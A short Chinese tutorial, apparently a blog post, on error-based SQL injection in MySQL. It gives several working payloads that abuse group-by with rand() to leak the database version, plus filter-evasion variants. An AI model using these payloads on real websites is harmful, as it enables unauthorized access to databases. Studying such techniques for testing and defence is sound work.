报错注入
在注入点的判断过程中,发现数据库中SQL语句的报错信息,会显示在页面中,因此可以进行报错注入
报错注入的原理:就是在错误信息中执行SQL语句。触发报错的方式很多,具体细节也不尽相同。报错注入有可能成功,也有可能不成功!可以多刷新几次
我们可以利用报错信息,获取数据库中的信息
[select concat(left(rand(),3),'^',(select version()),'^') as x,count(*) from information_schema.tables group by x;]
语句中的as是给concat(left(rand(),3,'^',(select version()),'^')起一个别名x 方便后面的聚合操作。此处as可以省略,直接写x即可。
[select concat(left(rand(),3),'^',(select version()),'^')x,count(*) from information_schema.tables group by x;]
如果关键的表被禁用了,可以采用如下语句
[select concat('^',version(),'^',floor(rand()*2))x,count(*) from (select 1 union select null union select !1)a group by x;]
如果rand()|count()被禁用了,可采用如下方式
[select min(@a:=1) from information_schema.tables group by concat('^',@@version,'^',@a:=(@a+1)%2);]
不依赖额外的函数和具体的表
[ select min(@a:=1) from (select 1 union select null union select !1)a group by concat('^', @@version, '^', @a:=(@a+1)%2);]
最低0.47元/天 解锁文章
430
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
